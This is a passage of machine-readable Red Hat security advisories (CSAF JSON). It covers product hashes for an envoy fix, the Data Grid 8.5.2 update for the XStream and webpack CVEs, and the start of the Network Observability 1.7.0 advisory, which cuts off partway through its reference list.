"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Potential to manipulate `x-envoy` headers from external sources", }, ], }
RHSA-2024:10214
Vulnerability from csaf_redhat
Published
2024-11-25 16:56
Modified
2025-04-09 20:59
Summary
Red Hat Security Advisory: Red Hat Data Grid 8.5.2 security update
Notes
Topic
An update for Red Hat Data Grid 8 is now available.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.
Data Grid 8.5.2 replaces Data Grid 8.5.1 and includes bug fixes and enhancements. Find out more about Data Grid 8.5.2 in the Release Notes[3].
Security Fix(es):
* CVE-2024-47072 com.thoughtworks.xstream/xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream [jdg-8] (CVE-2024-47072)
* CVE-2024-43788 webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule [jdg-8] (CVE-2024-43788)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "An update for Red Hat Data Grid 8 is now available.\n \nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.\n \nData Grid 8.5.2 replaces Data Grid 8.5.1 and includes bug fixes and enhancements. Find out more about Data Grid 8.5.2 in the Release Notes[3].\n\nSecurity Fix(es):\n\n* CVE-2024-47072 com.thoughtworks.xstream/xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream [jdg-8] (CVE-2024-47072)\n\n* CVE-2024-43788 webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule [jdg-8] (CVE-2024-43788)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:10214", url: "https://access.redhat.com/errata/RHSA-2024:10214", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.5/html-single/red_hat_data_grid_8.5_release_notes/index", url: "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.5/html-single/red_hat_data_grid_8.5_release_notes/index", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2324606", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2324606", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10214.json", }, ], title: "Red Hat Security Advisory: Red Hat Data Grid 8.5.2 security update", tracking: { current_release_date: "2025-04-09T20:59:37+00:00", generator: { date: "2025-04-09T20:59:37+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:10214", initial_release_date: "2024-11-25T16:56:04+00:00", revision_history: [ { date: "2024-11-25T16:56:04+00:00", number: "1", summary: "Initial version", }, { date: "2024-11-25T16:56:04+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-09T20:59:37+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Red Hat Data Grid", product: { name: "Red Hat Data Grid", product_id: "Red Hat Data Grid", product_identification_helper: { cpe: "cpe:/a:redhat:jboss_data_grid:8", }, }, }, ], category: "product_family", name: "Red Hat JBoss Data Grid", }, ], category: "vendor", name: "Red Hat", }, ], }, vulnerabilities: [ { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "Red Hat Data Grid", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-11-25T16:56:04+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "Red Hat Data Grid", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10214", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "Red Hat Data Grid", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "Red Hat Data Grid", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-47072", cwe: { id: "CWE-502", name: "Deserialization of Untrusted Data", }, discovery_date: "2024-11-08T13:47:39.374198+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2324606", }, ], notes: [ { category: "description", text: "A flaw was found in the XStream library. A remote attacker may trigger a denial of service by manipulating the processed input stream when XStream is configured to use the BinaryStreamDriver. This issue may lead to the termination of the application.", title: "Vulnerability description", }, { category: "summary", text: "com.thoughtworks.xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability in XStream is considered an Important severity rather than Moderate because it exposes applications to a denial of service (DoS) attack with relative ease. By exploiting the flaw in the `BinaryStreamDriver`, an attacker can manipulate the binary input stream to trigger a stack overflow, which terminates the application unexpectedly. Unlike moderate vulnerabilities, which may require specific conditions or limited privileges, this flaw enables remote attackers to forcefully terminate services by crafting malicious input, impacting system availability. Additionally, the vulnerability’s reliance on a common serialization mechanism elevates the risk, as it may affect applications across various environments and industries where XStream is deployed.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "Red Hat Data Grid", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-47072", }, { category: "external", summary: "RHBZ#2324606", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2324606", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-47072", url: "https://www.cve.org/CVERecord?id=CVE-2024-47072", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-47072", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-47072", }, { category: "external", summary: "https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266", url: "https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266", }, { category: "external", summary: "https://github.com/x-stream/xstream/security/advisories/GHSA-hfq9-hggm-c56q", url: "https://github.com/x-stream/xstream/security/advisories/GHSA-hfq9-hggm-c56q", }, { category: "external", summary: "https://x-stream.github.io/CVE-2024-47072.html", url: "https://x-stream.github.io/CVE-2024-47072.html", }, ], release_date: "2024-11-07T23:38:52.978000+00:00", remediations: [ { category: "vendor_fix", date: "2024-11-25T16:56:04+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "Red Hat Data Grid", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10214", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "Red Hat Data Grid", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "Red Hat Data Grid", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "com.thoughtworks.xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream", }, ], }
RHSA-2024:8014
Vulnerability from csaf_redhat
Published
2024-10-22 01:05
Modified
2025-04-10 05:32
Summary
Red Hat Security Advisory: Network Observability 1.7.0 for OpenShift
Notes
Topic
Network Observability 1.7 for Red Hat OpenShift
Red Hat Product Security has rated this update as having a security impact of
Important. A Common Vulnerability Scoring System (CVSS) base score, which gives
a detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Network Observability 1.7.0
Security Fix(es):
* Network Observability: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* Network Observability: XSS vulnerability via prototype pollution (CVE-2024-45801)
* Network Observability: axios: Server-Side Request Forgery (CVE-2024-39338)
* Network Observability: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* Network Observability: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* Network Observability: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* Network Observability: Improper Input Handling in Express Redirects (CVE-2024-43796)
* Network Observability: Improper Sanitization in serve-static (CVE-2024-43800)
* Network Observability: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)
* Network Observability: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)
* Network Observability: Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Network Observability 1.7 for Red Hat OpenShift\n\nRed Hat Product Security has rated this update as having a security impact of\nImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives\na detailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.", title: "Topic", }, { category: "general", text: "Network Observability 1.7.0\n\nSecurity Fix(es):\n\n* Network Observability: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* Network Observability: XSS vulnerability via prototype pollution (CVE-2024-45801)\n* Network Observability: axios: Server-Side Request Forgery (CVE-2024-39338)\n* Network Observability: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* Network Observability: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* Network Observability: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n* Network Observability: Improper Input Handling in Express Redirects (CVE-2024-43796)\n* Network Observability: Improper Sanitization in serve-static (CVE-2024-43800)\n* Network Observability: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)\n* Network Observability: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)\n* Network Observability: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:8014", url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2310527", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310527", }, { category: "external", summary: "2310528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310528", }, { category: "external", summary: "2310529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310529", }, { category: "external", summary: "2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "2312631", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312631", }, { category: "external", summary: "NETOBSERV-1377", url: "https://issues.redhat.com/browse/NETOBSERV-1377", }, { category: "external", summary: "NETOBSERV-1509", url: "https://issues.redhat.com/browse/NETOBSERV-1509", }, { category: "external", summary: "NETOBSERV-1538", url: "https://issues.redhat.com/browse/NETOBSERV-1538", }, { category: "external", summary: "NETOBSERV-1540", url: "https://issues.redhat.com/browse/NETOBSERV-1540", }, { category: "external", summary: "NETOBSERV-1564", url: "https://issues.redhat.com/browse/NETOBSERV-1564", }, { category: "external", summary: "NETOBSERV-163", url: "https://issues.redhat.com/browse/NETOBSERV-163", }, { category: "external", summary: "NETOBSERV-1666", url: "https://issues.redhat.com/browse/NETOBSERV-1666", }, { category: "external", summary: "NETOBSERV-1667", url: "https://issues.redhat.com/browse/NETOBSERV-1667", }, { category: "external", summary: "NETOBSERV-1733", url: "https://issues.redhat.com/browse/NETOBSERV-1733", }, { category: "external", summary: "NETOBSERV-1746", url: "https://issues.redhat.com/browse/NETOBSERV-1746", }, { category: "external", summary: "NETOBSERV-1748", url: "https://issues.redhat.com/browse/NETOBSERV-1748", }, { category: "external", summary: "NETOBSERV-1753", url: "https://issues.redhat.com/browse/NETOBSERV-1753", }, { category: "external", summary: "NETOBSERV-1766", url: "https://issues.redhat.com/browse/NETOBSERV-1766", }, { category: "external", summary: "NETOBSERV-1779", url: "https://issues.redhat.com/browse/NETOBSERV-1779", }, { category: "external", summary: "NETOBSERV-1783", 